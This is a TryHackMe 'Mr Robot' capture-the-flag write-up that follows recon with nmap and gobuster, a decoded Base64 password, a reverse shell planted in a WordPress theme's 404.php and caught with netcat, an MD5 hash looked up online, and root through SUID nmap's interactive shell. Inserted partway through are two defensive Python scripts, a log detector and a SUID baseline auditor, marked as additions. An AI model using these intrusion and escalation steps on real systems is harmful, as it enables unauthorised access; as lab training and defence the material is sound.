TryHackMe Mr Robot CTF Writeup

Hakan Altun
4 min read, Feb 27, 2021

Let’s start with an nmap scan first.

Command: nmap -vv -sCV 10.10.27.35

PORT    STATE  SERVICE  REASON       VERSION
22/tcp closed ssh conn-refused
80/tcp open http syn-ack Apache httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http syn-ack Apache httpd
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=www.example.com
| Issuer: commonName=www.example.com
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2015-09-16T10:45:03
| Not valid after: 2025-09-13T10:45:03
| MD5: 3c16 3b19 87c3 42ad 6634 c1c9 d0aa fb97
| SHA-1: ef0c 5fa5 931a 09a5 687c a2c2 80c4 c792 07ce f71b

TryHackMe gave us “robots” as a hint. Let’s take a look at the robots.txt file on the HTTP port.

And we get the first key.

Let’s run a directory scan to see if there are hidden files on the HTTP port.

Command: gobuster dir -u http://10.10.27.35 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.27.35
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
2021/02/27 07:54:22 Starting gobuster
===============================================================
/sitemap (Status: 200)
/video (Status: 301)
/images (Status: 301)
/0 (Status: 301)
/feed (Status: 301)
/blog (Status: 301)
/image (Status: 301)
/rss (Status: 301)
/login (Status: 302)
/atom (Status: 301)
/wp-content (Status: 301)
/admin (Status: 301)
/audio (Status: 301)
/intro (Status: 200)
/license (Status: 200)
/license.txt (Status: 200)
===============================================================
2021/02/27 07:56:43 Finished
===============================================================

Let’s take a look at the license.txt file.

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?do you want a password or something?ZWxs***************1Mgo=

We find a Base64-encoded string. Let’s decode it.

Command: echo 'ZWxs****************1Mgo=' | base64 -d

Bingo. We got the password of the Elliot user. Let’s log in from the WordPress login page.

Go to the Appearance > Editor section, select 404.php, and paste our reverse shell code there.

Now let’s start listening with netcat and trigger the reverse shell by requesting the edited 404.php page.

Command: nc -lvp 4444

http://10.10.27.35/wp-content/themes/twentyfifteen/404.php

listening on [any] 4444 ...
10.10.27.35: inverse host lookup failed: Unknown host
connect to [10.9.45.10] from (UNKNOWN) [10.10.27.35] 56155
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
13:14:28 up 37 min, 0 users, load average: 0.00, 0.34, 1.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$
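From the defender’s side, the sequence used above (an authenticated POST to the WordPress theme editor, then a direct request to the edited theme file) is easy to spot in the web server log. The following detector is an added example, not part of the writeup; the Apache access log lines are constructed to mirror the walkthrough, and the IPs, timestamps and theme name are assumed.

```python
import re
from collections import defaultdict

# Constructed sample Apache combined-log lines (not taken from the writeup):
# a login, a theme-editor save, then the edited 404.php being requested.
SAMPLE_LOG = """\
10.9.45.10 - - [27/Feb/2021:13:10:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0
10.9.45.10 - - [27/Feb/2021:13:11:40 +0000] "GET /wp-admin/theme-editor.php?file=404.php&theme=twentyfifteen HTTP/1.1" 200 51234
10.9.45.10 - - [27/Feb/2021:13:12:05 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0
10.9.45.10 - - [27/Feb/2021:13:14:20 +0000] "GET /wp-content/themes/twentyfifteen/404.php HTTP/1.1" 200 0
192.0.2.7 - - [27/Feb/2021:13:15:00 +0000] "GET /blog/ HTTP/1.1" 200 8812
"""

# client, timestamp, method, path, status from a combined-format line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# theme PHP files are normally included by WordPress, not requested directly
THEME_FILE_RE = re.compile(r'^/wp-content/themes/[^/]+/[^?]+\.php')


def parse(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return {"ip": ip, "ts": ts, "method": method, "path": path, "status": int(status)}


def find_theme_editor_abuse(log_text):
    """Alert for each client that saves a file via the theme editor and then
    requests a theme PHP file directly (the edited file being triggered)."""
    edits_by_ip = defaultdict(list)
    alerts = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].startswith("/wp-admin/theme-editor.php"):
            edits_by_ip[rec["ip"]].append(rec["ts"])
        elif rec["method"] == "GET" and THEME_FILE_RE.match(rec["path"]) and edits_by_ip.get(rec["ip"]):
            alerts.append({"ip": rec["ip"], "edited_at": edits_by_ip[rec["ip"]][-1],
                           "triggered": rec["path"], "at": rec["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in find_theme_editor_abuse(SAMPLE_LOG):
        print(alert)
```

Setting `define('DISALLOW_FILE_EDIT', true);` in wp-config.php removes the in-browser editor this sequence relies on, so the POST to theme-editor.php never succeeds in the first place.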

We spawn a pty with Python and set TERM to xterm. (The two steps are separate: the export has to run inside the spawned shell, not after it exits.)

Command: python -c 'import pty;pty.spawn("/bin/bash")'
Command (in the spawned shell): export TERM=xterm

daemon@linux:/$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@linux:/$

Looking through the files of a user named robot for a way to escalate privileges, we find a file named “password.raw-md5”.

robot:c3fcd3d76**************cca67e13b

It looks like an unsalted MD5 hash. We can look up the plaintext using https://md5.gromweb.com/

abcdefg************tuvwxyz

We can now switch to the robot user and read the second key.

Command: su robot

robot@linux:~$ cat key-2-of-3.txt 
822c7395************e3eb39f959

Now we need to be root to get the last key. Let’s start with a SUID scan.

Command: find / -perm -4000 -type f 2>/dev/null

/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

Yeah, I think we found it: /usr/local/bin/nmap is SUID, and we can use it.

nmap --interactive
nmap> !sh
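The same SUID listing is what a hardening audit should be diffing against a baseline: a setuid binary under /usr/local (or any other non-package path) is a finding on its own, and so is anything not in the expected set. The script below is an added example, not from the writeup; the expected set is assumed from the scan output above minus the odd one out, and the scan text is a copy of that output.

```python
# Baseline of setuid binaries expected on this host. Assumption: built from
# the writeup's own scan minus the one that does not belong; adjust per build.
EXPECTED_SUID = {
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/pt_chown",
    "/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper",
}

# Package managers do not install setuid files here; anything found is suspect.
NON_PACKAGED_PREFIXES = ("/usr/local/", "/opt/", "/tmp/", "/home/", "/var/tmp/")

# Copy of the `find / -perm -4000 -type f 2>/dev/null` output from the writeup.
SCAN_OUTPUT = """\
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
"""


def unexpected_suid(scan_text, baseline=EXPECTED_SUID):
    """Map each setuid path from a find(1) listing to the reason it is flagged.
    Location is checked first so a baseline entry cannot whitelist /usr/local."""
    findings = {}
    for line in scan_text.splitlines():
        path = line.strip()
        if not path:
            continue
        if path.startswith(NON_PACKAGED_PREFIXES):
            findings[path] = "setuid file outside package-managed paths"
        elif path not in baseline:
            findings[path] = "not in baseline"
    return findings


if __name__ == "__main__":
    for path, reason in unexpected_suid(SCAN_OUTPUT).items():
        print(f"{path}: {reason}")
```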

Now we can go to the root directory and read our last key.

# cd /root
# ls
firstboot_done key-3-of-3.txt
# cat key*
04787ddef2***************21670b4e4
#

Thank you for reading and solving
